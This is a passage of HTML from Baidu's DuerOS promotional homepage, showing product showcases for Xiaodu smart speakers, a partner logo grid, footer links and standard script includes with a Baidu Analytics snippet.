                                    <p>美西时间1月8日，在 CES 2019百度展台上，作为百度涉足消费电子领域的代表，小度家族收获了来自国内外</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                                        </div>
            </div>
            <a class="arrow-left" href="#"></a>
            <a class="arrow-right" href="#"></a>
        </div>
        <p class="lookmore"><a href="/html/news/activity/index.html" title="">更多动态</a></p>
    </div>
</div>
<div class="differ-cont">
    <h2 class="news-tit">我们的人工智能为何与众不同？</h2>
    <div class="differ-ul">
        <ul class="clearfix">
                                                <li class="js">
                <a href="/html/dueros/index.html" title="">
                    <span class="nums">01</span>
                    <p>DuerOS整合了<br />
世界顶尖人工智能<br />
语音图像技术</p>
                    <div class="img">
                        <img class="i1" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605105149589.jpg" alt="" >
                        <img class="i2" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605104321430.gif" alt="" >
                    </div>
                    <div class="detail"><p><span>查看详情</span><em></em></p></div>
                </a>
            </li>
                                    <li class="os">
                <a href="/html/dueros/index.html" title="">
                    <span class="nums">02</span>
                    <p>DuerOS能帮助企业<br />
开发者一站式<br />
实现人工智能化</p>
                    <div class="img">
                        <img class="i1" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605105202478.jpg" alt="" >
                        <img class="i3" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605104344621.gif" alt="" >
                    </div>
                    <div class="detail"><p><span>查看详情</span><em></em></p></div>
                </a>
            </li>
                                    <li class="js">
                <a href="/html/dueros/index.html" title="">
                    <span class="nums">03</span>
                    <p>DuerOS<br />
可以满足几十个场景<br />
拥有10大类目250多项技能</p>
                    <div class="img">
                        <img class="i1" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605105214891.jpg" alt="" >
                        <img class="i4" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605104400918.gif" alt="" >
                    </div>
                    <div class="detail"><p><span>查看详情</span><em></em></p></div>
                </a>
            </li>
                                    <li class="os">
                <a href="/html/dueros/index.html" title="">
                    <span class="nums">04</span>
                    <p>DuerOS内容资源丰富<br />
且开放互通</p>
                    <div class="img">
                        <img class="i1" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605105234731.jpg" alt="" >
                        <img class="i5" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0605/20170605104413258.gif" alt="" >
                    </div>
                    <div class="detail"><p><span>查看详情</span><em></em></p></div>
                </a>
            </li>
                                            </ul>
    </div>
</div>
<div class="friends-team" hidden >
    <h2 class="news-tit">对话式人工智能时代来临</h2>
    <p class="liti-tit">把DuerOS带在身边，是怎样一种体验？</p>
    <div class="sences">
        <div class="sences-imgcont">
                                                <div class="sences-img sences-imgcur">
                    <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0609/20170609105053643.jpg" alt="" >
                    <p>把DuerOS带在身边是怎样一种体验？                    <br>
                    <a href="/html/solution/index.html">了解详情</a>
                </p>
            </div>
                                    <div class="sences-img ">
                    <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0616/20170616064449896.jpg" alt="" >
                    <p>把DuerOS带在身边是怎样一种体验？                    <br>
                    <a href="/html/solution/index.html">了解详情</a>
                </p>
            </div>
                                    <div class="sences-img ">
                    <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0616/20170616064436758.jpg" alt="" >
                    <p>把DuerOS带在身边是怎样一种体验？                    <br>
                    <a href="/html/solution/index.html">了解详情</a>
                </p>
            </div>
                                    <div class="sences-img ">
                    <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0616/20170616064334121.jpg" alt="" >
                    <p>把DuerOS带在身边是怎样一种体验？                    <br>
                    <a href="/html/solution/index.html">了解详情</a>
                </p>
            </div>
                                </div>
        <div class="sences-tabbtn">
                                    <a href="javascript:;" class="st1 cur"><em></em></a>
                                    <a href="javascript:;" class="st2 "><em></em></a>
                                    <a href="javascript:;" class="st3 "><em></em></a>
                                    <a href="javascript:;" class="st4 "><em></em></a>
                                            </div>
    </div>
</div>
<div class="friends-team">
    <h2 class="news-tit">当商业遇上数字智能会发生什么?</h2>
    <p class="liti-tit">传统数字业务搭载DuerOS系统，将开启全新的智能时代</p>
    <div class="example-cont">
        <div class="example-m clearfix">
                        <div class="example-left">
                <ul>
                                                            <li class="cur"><em></em><span>小度智能音箱</span>
                        <p>百度AI实力体现，听得懂，聊得来的AI小当家</p>
                        <i></i>
                    </li>
                                                            <li ><em></em><span>小度在家智能视频音箱</span>
                        <p>百度AI首款智能视频音箱</p>
                        <i></i>
                    </li>
                                                            <li ><em></em><span>HTC U11+</span>
                        <p>11月2日，HTC发布U系列最新旗舰机，U11+</p>
                        <i></i>
                    </li>
                                                            <li ><em></em><span>Doss小度版智能音箱</span>
                        <p>一声 “小度，小度”开启智能家庭生活新篇章</p>
                        <i></i>
                    </li>
                                                        </ul>
                <p class="lookmore"><a href="/html/solution/index.html"  title="">更多案例</a></p>
            </div>
            <div class="example-right">
                <div class="example-img">
                    <div class="topic-feature-image-container">
                        <div class="topic-feature-image-container-inner">
                                                                                    <figure id="figure-1" class="topic-feature-figure f1">
                                <em></em>
                                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0610/20180610032723618.jpg" alt="" class="topic-feature-image">
                            </figure>
                                                                                    <figure id="figure-2" class="topic-feature-figure f2">
                                <em></em>
                                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0326/20180326081233177.jpg" alt="" class="topic-feature-image">
                            </figure>
                                                                                    <figure id="figure-3" class="topic-feature-figure f3">
                                <em></em>
                                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1110/20171110050214472.jpg" alt="" class="topic-feature-image">
                            </figure>
                                                                                    <figure id="figure-4" class="topic-feature-figure f4">
                                <em></em>
                                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1222/20171222101929461.png" alt="" class="topic-feature-image">
                            </figure>
                                                                                </div>
                    </div>
                </div>
                <a href="javascript:;" class="arrow-left"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images//dumi/imgCon_left.png" alt="" ></a>
                <a href="javascript:;" class="arrow-right"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images//dumi/imgCon_right.png" alt="" ></a>
            </div>
                    </div>
    </div>
</div>
<div class="friends-team">
    <h2 class="news-tit">合作企业</h2>
    <p class="liti-tit">DuerOS正在期待更多伙伴的加入，准备好颠覆这个世界了吗？</p>
    <ul class="firends-logo clearfix">
                        <li>
            <a href="/html/2018/special_0224/10.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312033058739.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0228/20180228112717168.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0314/20180314070522180.jpeg" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0314/20180314070532364.jpeg" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1109/6.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312033034820.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212101740697.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312033006427.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212101757553.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032944714.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102039260.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032918548.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102056445.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032856363.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102110333.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032817321.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102124878.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1024/3.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032754160.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102139643.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1109/9.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032733660.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102153456.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032709255.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102215302.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1109/8.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032648155.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102239596.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1109/7.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032626311.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102315227.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032537459.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102339319.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0403/20190403113541448.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0403/20190403113541448.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0326/20180326085931291.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0326/20180326085952985.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032417410.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102426637.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032355137.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102442798.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032330466.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102457569.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032256596.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102510930.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032233892.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102532775.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032207418.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102552648.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032144556.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102618119.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032111903.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102631103.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="/html/2017/special_1109/5.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032041567.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102644808.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312032016553.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102707544.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031944160.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212102720205.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031924558.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0119/20180119042806171.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031859913.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1214/20171214011345551.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031831243.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212111621304.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="javascript:;" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031808612.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212111606744.png" alt=""  class="img2">
            </a>
        </li>
                <li>
            <a href="html/2017/special_1025/4.html" title="">
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0312/20180312031734876.png" alt="" >
                <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1212/20171212111547629.png" alt=""  class="img2">
            </a>
        </li>
                    </ul>
    <a class="friends-s-btn" href="javascript:;">查看更多</a>
</div>
<div class="footer">
    <div class="footer-content clearfix">
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <a href="/"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images//dumi/logo2.png" alt="" ></a>
            </div>
        </div>
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <div class="ft-nav-tit">商务合作</div>
                <div class="ft-sec-investor clearfix">
                    <div class="ft-nav-item fl">
                        <ul class="">
                            <!-- <li><a href="/html/solution/index.html">解决方案</a></li>-->
                            <!--<li><a href="javascript:;">成功案例</a></li>-->
                            <li class="f-email-item"><a href="mailto:dueros-bd@baidu.com">商务联系</a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <div class="ft-nav-tit">开发者</div>
                <div class="ft-nav-item">
                    <ul class="">
                        <li><a href="https://dueros.baidu.com/open" target="_blank">开放平台</a></li>
                        <li><a href="http://open.duer.baidu.com/doc/overall/open-platform-intro_markdown" target="_blank">帮助文档</a></li>
                    </ul>
                </div>
            </div>
        </div>
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <div class="ft-nav-tit">关于我们</div>
                <div class="ft-nav-item">
                    <ul class="">
                                                                                                <li><a href="/html/about-us/about_us/index.html">我们是谁</a></li>
                                                                                                <li><a href="/html/about-us/events/index.html">大事记</a></li>
                                                                                                                                                                                                                                                <li><a href="/html/about-us/contact/index.html">联系我们</a></li>
                                                                                                <li><a href="https://developer.dueros.baidu.com/doc/overall/user-agreement_markdown">用户协议</a></li>
                        <li><a href="https://developer.dueros.baidu.com/doc/overall/privacy-policy_markdown">隐私政策</a></li>
                    </ul>
                </div>
            </div>
        </div>
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <div class="ft-nav-tit">友情链接</div>
                <div class="ft-nav-item">
                    <ul class="">
                                                                        <li><a href="https://snowboy.kitt.ai/" target="_blank">KITT.AI</a></li>
                                                <li><a href="http://prometheus.baidu.com" target="_blank">普罗米修斯</a></li>
                                                                    </ul>
                </div>
            </div>
        </div>
        <div class="ft-vertical-block">
            <div class="ft-nav-list">
                <div class="ft-nav-tit">关注我们</div>
                <div class="ft-nav-item">
                    <p class="share-icon">
                        <a class="s1" href="http://weibo.com/dumirobot" target="_blank"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images//dumi/imgCon_sina.png" alt="" ></a>
                        <a class="s2" href="javascript:;"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images//dumi/imgCon_wx.png" alt="" ></a>
                    </p>
                    <!--<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>-->
                    <a href="http://tieba.baidu.com/f?ie=utf-8&kw=%E5%BA%A6%E7%A7%98" target="_blank" title="">DuerOS百度贴吧</a>
                </div>
                <div class="wx-ma">
                    <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0617/20170617055131579.jpg" alt="">
                </div>
            </div>
        </div>
    </div>

    <div class="thd-nav">
        <ul class="thd-navul">
            <li>
                <span>商务合作</span>
                <div class="moreul">
                    <!--<p><a href="/html/solution/index.html"  title="">解决方案</a></p>-->
                    <!--<p><a href="javascript:;"  title="">成功案例</a></p>-->
                    <p class="f-email-item"><a href="mailto:dueros-bd@baidu.com" title="">商务联系</a></p>
                </div>
                <em></em>
            </li>
            <li>
                <span>开发者</span>
                <div class="moreul">
                    <p><a class="kfz-item" href="" target="_blank" title="" ></a></p>
                    <p><a class="kfz-item" href="http://open.duer.baidu.com/doc/overall/open-platform-intro_markdown" target="_blank" title="">帮助文档</a></p>
                </div>
                <em></em>
            </li>
            <li>
                <span>关于我们</span>
                <div class="moreul">
                                                                                <p><a href="/html/about-us/about_us/index.html">我们是谁</a></p>
                                                                                <p><a href="/html/about-us/events/index.html">大事记</a></p>
                                                                                                                                                                                                        <p><a href="/html/about-us/contact/index.html">联系我们</a></p>
                                                                                <p><a href="https://developer.dueros.baidu.com/doc/overall/user-agreement_markdown">用户协议</a></p>
                    <p><a href="https://developer.dueros.baidu.com/doc/overall/privacy-policy_markdown">隐私政策</a></p>
                </div>
                <em></em>
            </li>
            <li>
                <span>友情链接</span>
                <div class="moreul">
                                                            <p><a href="https://snowboy.kitt.ai/" target="_blank">KITT.AI</a></p>
                                        <p><a href="http://prometheus.baidu.com" target="_blank">普罗米修斯</a></p>
                                                        </div>
                <em></em>
            </li>
            <li>
                <span>关注我们</span>
                <div class="moreul">
                    <p><a class="" href="http://weibo.com/dumirobot"  title="">新浪</a></p>
                    <p class="wx-btn"><a href="javascript:;" title="">微信</a>
                        <span class="wx-ma wx-ma2">
                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/0617/20170617055131579.jpg" alt="">
                        </span>
                    </p>
                    <p><a href="http://tieba.baidu.com/f?ie=utf-8&kw=%E5%BA%A6%E7%A7%98" target="_blank" title="">DuerOS百度贴吧</a></p>
                </div>
                <em></em>
            </li>
        </ul>
    </div>
    <div class="foot-btm clearfix">
        <p class="fl">Baidu 版权所有</p>
        <p class="fr">京ICP证030173号</p>
    </div>
</div>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/jquery.validate.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/jwplayer/jwplayer.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/jquery.particleground.min.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/swiper.min.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/swiper.3dflow.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/touch_ex.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/content.js"></script>
<script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/icoroll.js"></script>
<!--统计代码-->
<script>
var _hmt = _hmt || [];
(function () {
    var hm = document.createElement('script');
    hm.src = 'https://hm.baidu.com/hm.js?022b771c39f64c147336b5cfd2b71754';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm, s);
})();
</script>
</body>
</html>
